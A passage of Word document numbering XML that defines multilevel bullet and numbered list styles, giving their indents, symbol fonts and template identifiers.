      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A66019CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="477B791F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAF413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47961364"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="92F64D90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="11380B5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8682D098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DB363372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="14C4F40E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6BB0AC34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E61EA282">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F29CCD40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CB668920">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="45" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C830D67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C45210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4D463112"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CBE57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4F50694B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40C088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4F891262"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE760382"/>
    <w:lvl w:ilvl="0" w:tplc="389AB6E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="49" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5616F5E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A0E628CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="13E4522A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="74F8D0BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C496528E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A49A2BCE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E2101EEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B164FCDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F2AC61FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C8085D76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="50" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="564443CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AE5690BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AC4C7900">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5B8EC42C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="87B24ADC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="26CA7108">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A99EC25C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D54EAEDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C73CE116">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C4884C26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="51" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="57466CA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9940AC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58EC166D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="063455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5909669B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="351CDD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59277322"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75CC8C7C"/>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65B316EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="2E1EB714">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1F60288E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="504E4B10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="391C4E30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DF0EB42A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="298C6276">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C4602B5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EB06C956">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6436016C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="56" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="666A4C90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C1C2A250">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5AC8224A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C3C4B48A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A2122F22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="842293D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C20557E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="51DCFA62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0E7870E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C00402B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="57" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6928788D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E78EF7A8"/>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69912169"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0C8E7E0"/>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7043186E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A65CB4B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9822B956">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="861C68CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1E46C7D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9864C1CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E0AA7264">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="09CA0F26">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7696BA30">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="541E7DC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="60" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="709F5201"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="443E78F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="60A61452">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DAAC9928">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
